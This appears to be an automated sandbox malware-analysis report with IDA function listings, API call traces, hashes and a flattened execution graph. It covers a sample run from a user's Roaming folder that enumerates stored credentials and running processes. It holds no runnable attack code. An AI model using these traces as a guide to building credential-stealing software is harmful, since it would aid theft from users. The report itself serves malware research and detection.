• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 1000715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
• _free.LIBCMT ref: 100071B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
• _free.LIBCMT ref: 10005BB4
• _free.LIBCMT ref: 10005BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
• lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
• lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
• lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
• lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
Memory Dump Source
• Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 100091D0
                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                • _free.LIBCMT ref: 100091E2
                                                                                                                                                • _free.LIBCMT ref: 100091F4
                                                                                                                                                • _free.LIBCMT ref: 10009206
                                                                                                                                                • _free.LIBCMT ref: 10009218
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 1000536F
                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                • _free.LIBCMT ref: 10005381
                                                                                                                                                • _free.LIBCMT ref: 10005394
                                                                                                                                                • _free.LIBCMT ref: 100053A5
                                                                                                                                                • _free.LIBCMT ref: 100053B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\DGlxtFUfY.exe,00000104), ref: 10004C1D
                                                                                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                                • API String ID: 2506810119-1118272229
                                                                                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen
                                                                                                                                                • String ID: : $Se.
                                                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                APIs
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:6.3%
                                                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                Signature Coverage:0.8%
                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                Total number of Limit Nodes:68
40e911 38670->38672 38673 40e90a ??3@YAXPAX 38670->38673 38671->38670 38674 40e931 ??2@YAPAXI ??2@YAPAXI 38672->38674 38675 40e921 ??3@YAXPAX 38672->38675 38676 40e92a ??3@YAXPAX 38672->38676 38673->38672 38674->38658 38675->38676 38676->38674 38678 40aa04 free 38677->38678 38679 40ea88 38678->38679 38680 40aa04 free 38679->38680 38681 40ea90 38680->38681 38682 40aa04 free 38681->38682 38683 40ea98 38682->38683 38684 40aa04 free 38683->38684 38685 40eaa0 38684->38685 38686 40a9ce 4 API calls 38685->38686 38687 40eab3 38686->38687 38688 40a9ce 4 API calls 38687->38688 38689 40eabd 38688->38689 38690 40a9ce 4 API calls 38689->38690 38691 40eac7 38690->38691 38692 40a9ce 4 API calls 38691->38692 38693 40ead1 38692->38693 38693->38666 38694->38626 38695->38630 38753 40b2cc 38696->38753 38698 402b0a 38699 40b2cc 27 API calls 38698->38699 38700 402b23 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402b3a 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402b54 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402b6b 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402b82 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402b99 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402bb0 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402bc7 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402bde 38715->38716 38717 40b2cc 27 API calls 38716->38717 38718 402bf5 38717->38718 38719 40b2cc 27 API calls 38718->38719 38720 402c0c 38719->38720 38721 40b2cc 27 API calls 38720->38721 38722 402c23 38721->38722 38723 40b2cc 27 API calls 38722->38723 38724 402c3a 38723->38724 38725 40b2cc 27 API calls 38724->38725 38726 402c51 38725->38726 38727 40b2cc 27 API calls 38726->38727 38728 402c68 38727->38728 38729 40b2cc 27 API calls 38728->38729 38730 402c7f 38729->38730 38731 40b2cc 27 API calls 38730->38731 38732 402c99 38731->38732 38733 40b2cc 27 API calls 38732->38733 38734 402cb3 38733->38734 38735 40b2cc 27 API 
calls 38734->38735 38736 402cd5 38735->38736 38737 40b2cc 27 API calls 38736->38737 38738 402cf0 38737->38738 38739 40b2cc 27 API calls 38738->38739 38740 402d0b 38739->38740 38741 40b2cc 27 API calls 38740->38741 38742 402d26 38741->38742 38743 40b2cc 27 API calls 38742->38743 38744 402d3e 38743->38744 38745 40b2cc 27 API calls 38744->38745 38746 402d59 38745->38746 38747 40b2cc 27 API calls 38746->38747 38748 402d78 38747->38748 38749 40b2cc 27 API calls 38748->38749 38750 402d93 38749->38750 38751 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38750->38751 38751->38634 38752->38624 38756 40b58d 38753->38756 38755 40b2d1 38755->38698 38757 40b5a4 GetModuleHandleW FindResourceW 38756->38757 38758 40b62e 38756->38758 38759 40b5c2 LoadResource 38757->38759 38761 40b5e7 38757->38761 38758->38755 38760 40b5d0 SizeofResource LockResource 38759->38760 38759->38761 38760->38761 38761->38758 38769 40afcf 38761->38769 38763 40b608 memcpy 38772 40b4d3 memcpy 38763->38772 38765 40b61e 38773 40b3c1 18 API calls 38765->38773 38767 40b626 38774 40b04b 38767->38774 38770 40b04b ??3@YAXPAX 38769->38770 38771 40afd7 ??2@YAPAXI 38770->38771 38771->38763 38772->38765 38773->38767 38775 40b051 ??3@YAXPAX 38774->38775 38776 40b05f 38774->38776 38775->38776 38776->38758 38777->38642 38779 4032c4 38778->38779 38780 40b633 free 38779->38780 38781 403316 38780->38781 38800 44553b 38781->38800 38785 403480 38998 40368c 15 API calls 38785->38998 38787 403489 38788 40b633 free 38787->38788 38789 403495 38788->38789 38789->38644 38790 4033a9 memset memcpy 38791 4033ec wcscmp 38790->38791 38792 40333c 38790->38792 38791->38792 38792->38785 38792->38790 38792->38791 38996 4028e7 11 API calls 38792->38996 38997 40f508 6 API calls 38792->38997 38794 403421 _wcsicmp 38794->38792 38797 444a64 FreeLibrary 38796->38797 38798 444a83 38796->38798 38797->38798 38798->38644 38799->38645 38801 445548 38800->38801 38802 445599 38801->38802 38999 40c768 38801->38999 
38803 4455a8 memset 38802->38803 38946 4457f2 38802->38946 39082 403988 38803->39082 38810 445854 38811 4458aa 38810->38811 39207 403c9c memset memset memset memset memset 38810->39207 38813 44594a 38811->38813 38814 4458bb memset memset 38811->38814 38812 445672 39093 403fbe memset memset memset memset memset 38812->39093 38816 4459ed 38813->38816 38817 44595e memset memset 38813->38817 38819 414c2e 16 API calls 38814->38819 38822 445a00 memset memset 38816->38822 38823 445b22 38816->38823 38824 414c2e 16 API calls 38817->38824 38818 4455e5 38818->38812 38836 44560f 38818->38836 38825 4458f9 38819->38825 39230 414c2e 38822->39230 38828 445bca 38823->38828 38829 445b38 memset memset memset 38823->38829 38834 44599c 38824->38834 38835 40b2cc 27 API calls 38825->38835 38846 445c8b memset memset 38828->38846 38896 445cf0 38828->38896 38841 445bd4 38829->38841 38842 445b98 38829->38842 38830 445849 39295 40b1ab free free 38830->39295 38845 40b2cc 27 API calls 38834->38845 38847 445909 38835->38847 38838 4087b3 338 API calls 38836->38838 38857 445621 38838->38857 38840 44589f 39296 40b1ab free free 38840->39296 38854 414c2e 16 API calls 38841->38854 38842->38841 38850 445ba2 38842->38850 38859 4459ac 38845->38859 38848 414c2e 16 API calls 38846->38848 38856 409d1f 6 API calls 38847->38856 38860 445cc9 38848->38860 39368 4099c6 wcslen 38850->39368 38851 4456b2 39283 40b1ab free free 38851->39283 38853 40b2cc 27 API calls 38863 445a4f 38853->38863 38865 445be2 38854->38865 38855 403335 38995 4452e5 45 API calls 38855->38995 38868 445919 38856->38868 39281 4454bf 20 API calls 38857->39281 38858 445823 38858->38830 38876 4087b3 338 API calls 38858->38876 38869 409d1f 6 API calls 38859->38869 38870 409d1f 6 API calls 38860->38870 38861 445879 38861->38840 38880 4087b3 338 API calls 38861->38880 39245 409d1f wcslen wcslen 38863->39245 38874 40b2cc 27 API calls 38865->38874 38866 445d3d 38894 40b2cc 27 API calls 38866->38894 38867 445d88 memset memset memset 38877 414c2e 16 
API calls 38867->38877 39297 409b98 GetFileAttributesW 38868->39297 38878 4459bc 38869->38878 38879 445ce1 38870->38879 38871 445bb3 39371 445403 memset 38871->39371 38872 445680 38872->38851 39116 4087b3 memset 38872->39116 38883 445bf3 38874->38883 38876->38858 38886 445dde 38877->38886 39364 409b98 GetFileAttributesW 38878->39364 39388 409b98 GetFileAttributesW 38879->39388 38880->38861 38893 409d1f 6 API calls 38883->38893 38884 445928 38884->38813 39298 40b6ef 38884->39298 38895 40b2cc 27 API calls 38886->38895 38888 4459cb 38888->38816 38905 40b6ef 252 API calls 38888->38905 38892 40b2cc 27 API calls 38898 445a94 38892->38898 38900 445c07 38893->38900 38901 445d54 _wcsicmp 38894->38901 38904 445def 38895->38904 38896->38855 38896->38866 38896->38867 38897 445389 258 API calls 38897->38828 39250 40ae18 38898->39250 38899 44566d 38899->38946 39167 413d4c 38899->39167 38908 445389 258 API calls 38900->38908 38909 445d71 38901->38909 38972 445d67 38901->38972 38903 445665 39282 40b1ab free free 38903->39282 38910 409d1f 6 API calls 38904->38910 38905->38816 38913 445c17 38908->38913 39389 445093 23 API calls 38909->39389 38916 445e03 38910->38916 38912 4456d8 38918 40b2cc 27 API calls 38912->38918 38919 40b2cc 27 API calls 38913->38919 38915 44563c 38915->38903 38921 4087b3 338 API calls 38915->38921 39390 409b98 GetFileAttributesW 38916->39390 38917 40b6ef 252 API calls 38917->38855 38923 4456e2 38918->38923 38924 445c23 38919->38924 38920 445d83 38920->38855 38921->38915 39284 413fa6 _wcsicmp _wcsicmp 38923->39284 38928 409d1f 6 API calls 38924->38928 38926 445e12 38929 445e6b 38926->38929 38933 40b2cc 27 API calls 38926->38933 38931 445c37 38928->38931 39392 445093 23 API calls 38929->39392 38930 4456eb 38936 4456fd memset memset memset memset 38930->38936 38937 4457ea 38930->38937 38938 445389 258 API calls 38931->38938 38932 445b17 39365 40aebe 38932->39365 38940 445e33 38933->38940 39285 409c70 wcscpy wcsrchr 38936->39285 39288 413d29 38937->39288 38944 
445c47 38938->38944 38945 409d1f 6 API calls 38940->38945 38942 445e7e 38947 445f67 38942->38947 38950 40b2cc 27 API calls 38944->38950 38951 445e47 38945->38951 38946->38810 39184 403e2d memset memset memset memset memset 38946->39184 38952 40b2cc 27 API calls 38947->38952 38948 445ab2 memset 38953 40b2cc 27 API calls 38948->38953 38955 445c53 38950->38955 39391 409b98 GetFileAttributesW 38951->39391 38957 445f73 38952->38957 38958 445aa1 38953->38958 38954 409c70 2 API calls 38959 44577e 38954->38959 38960 409d1f 6 API calls 38955->38960 38962 409d1f 6 API calls 38957->38962 38958->38932 38958->38948 38963 409d1f 6 API calls 38958->38963 39257 40add4 38958->39257 39262 445389 38958->39262 39271 40ae51 38958->39271 38964 409c70 2 API calls 38959->38964 38965 445c67 38960->38965 38961 445e56 38961->38929 38969 445e83 memset 38961->38969 38966 445f87 38962->38966 38963->38958 38967 44578d 38964->38967 38968 445389 258 API calls 38965->38968 39395 409b98 GetFileAttributesW 38966->39395 38967->38937 38974 40b2cc 27 API calls 38967->38974 38968->38828 38973 40b2cc 27 API calls 38969->38973 38972->38855 38972->38917 38975 445eab 38973->38975 38976 4457a8 38974->38976 38977 409d1f 6 API calls 38975->38977 38978 409d1f 6 API calls 38976->38978 38980 445ebf 38977->38980 38979 4457b8 38978->38979 39287 409b98 GetFileAttributesW 38979->39287 38982 40ae18 9 API calls 38980->38982 38986 445ef5 38982->38986 38984 40ae51 9 API calls 38984->38986 38986->38984 38987 445f5c 38986->38987 38989 40add4 2 API calls 38986->38989 38990 40b2cc 27 API calls 38986->38990 38991 409d1f 6 API calls 38986->38991 38993 445f3a 38986->38993 39393 409b98 GetFileAttributesW 38986->39393 38988 40aebe FindClose 38987->38988 38988->38947 38989->38986 38990->38986 38991->38986 39394 445093 23 API calls 38993->39394 38995->38792 38996->38794 38997->38792 38998->38787 39000 40c775 38999->39000 39396 40b1ab free free 39000->39396 39002 40c788 39397 40b1ab free free 39002->39397 39004 40c790 39398 40b1ab 
free free 39004->39398 39006 40c798 39007 40aa04 free 39006->39007 39008 40c7a0 39007->39008 39399 40c274 memset 39008->39399 39013 40a8ab 9 API calls 39014 40c7c3 39013->39014 39015 40a8ab 9 API calls 39014->39015 39016 40c7d0 39015->39016 39428 40c3c3 39016->39428 39020 40c877 39029 40bdb0 39020->39029 39021 40c86c 39470 4053fe 39 API calls 39021->39470 39027 40c7e5 39027->39020 39027->39021 39028 40c634 49 API calls 39027->39028 39453 40a706 39027->39453 39028->39027 39663 404363 39029->39663 39032 40bf5d 39683 40440c 39032->39683 39034 40bdee 39034->39032 39037 40b2cc 27 API calls 39034->39037 39035 40bddf CredEnumerateW 39035->39034 39083 40399d 39082->39083 39729 403a16 39083->39729 39086 403a12 wcsrchr 39086->38818 39089 4039a3 39090 4039f4 39089->39090 39092 403a09 39089->39092 39740 40a02c CreateFileW 39089->39740 39091 4099c6 2 API calls 39090->39091 39090->39092 39091->39092 39743 40b1ab free free 39092->39743 39094 414c2e 16 API calls 39093->39094 39095 404048 39094->39095 39096 414c2e 16 API calls 39095->39096 39097 404056 39096->39097 39098 409d1f 6 API calls 39097->39098 39099 404073 39098->39099 39100 409d1f 6 API calls 39099->39100 39101 40408e 39100->39101 39102 409d1f 6 API calls 39101->39102 39103 4040a6 39102->39103 39104 403af5 20 API calls 39103->39104 39105 4040ba 39104->39105 39106 403af5 20 API calls 39105->39106 39107 4040cb 39106->39107 39770 40414f memset 39107->39770 39109 404140 39784 40b1ab free free 39109->39784 39110 4040ec memset 39114 4040e0 39110->39114 39112 404148 39112->38872 39113 4099c6 2 API calls 39113->39114 39114->39109 39114->39110 39114->39113 39115 40a8ab 9 API calls 39114->39115 39115->39114 39797 40a6e6 WideCharToMultiByte 39116->39797 39168 40b633 free 39167->39168 39169 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39168->39169 39170 413f00 Process32NextW 39169->39170 39171 413da5 OpenProcess 39170->39171 39172 413f17 CloseHandle 39170->39172 39173 413eb0 39171->39173 39174 413df3 memset 39171->39174 
39172->38912 39173->39170 39176 413ebf free 39173->39176 39177 4099f4 3 API calls 39173->39177 40033 413f27 39174->40033 39176->39173 39177->39173 39179 413e37 GetModuleHandleW 39180 413e1f 39179->39180 39181 413e46 GetProcAddress 39179->39181 39180->39179 40038 413959 39180->40038 40054 413ca4 39180->40054 39181->39180 39183 413ea2 CloseHandle 39183->39173 39185 414c2e 16 API calls 39184->39185 39186 403eb7 39185->39186 39187 414c2e 16 API calls 39186->39187 39188 403ec5 39187->39188 39189 409d1f 6 API calls 39188->39189 39190 403ee2 39189->39190 39191 409d1f 6 API calls 39190->39191 39192 403efd 39191->39192 39193 409d1f 6 API calls 39192->39193 39194 403f15 39193->39194 39195 403af5 20 API calls 39194->39195 39196 403f29 39195->39196 39197 403af5 20 API calls 39196->39197 39198 403f3a 39197->39198 39199 40414f 33 API calls 39198->39199 39205 403f4f 39199->39205 39200 403faf 40068 40b1ab free free 39200->40068 39202 403f5b memset 39202->39205 39203 403fb7 39203->38858 39204 4099c6 2 API calls 39204->39205 39205->39200 39205->39202 39205->39204 39206 40a8ab 9 API calls 39205->39206 39206->39205 39208 414c2e 16 API calls 39207->39208 39209 403d26 39208->39209 39210 414c2e 16 API calls 39209->39210 39211 403d34 39210->39211 39212 409d1f 6 API calls 39211->39212 39213 403d51 39212->39213 39214 409d1f 6 API calls 39213->39214 39215 403d6c 39214->39215 39216 409d1f 6 API calls 39215->39216 39217 403d84 39216->39217 39218 403af5 20 API calls 39217->39218 39219 403d98 39218->39219 39220 403af5 20 API calls 39219->39220 39221 403da9 39220->39221 39222 40414f 33 API calls 39221->39222 39228 403dbe 39222->39228 39223 403e1e 40069 40b1ab free free 39223->40069 39224 403dca memset 39224->39228 39226 403e26 39226->38861 39227 4099c6 2 API calls 39227->39228 39228->39223 39228->39224 39228->39227 39229 40a8ab 9 API calls 39228->39229 39229->39228 39231 414b81 9 API calls 39230->39231 39232 414c40 39231->39232 39233 414c73 memset 39232->39233 40070 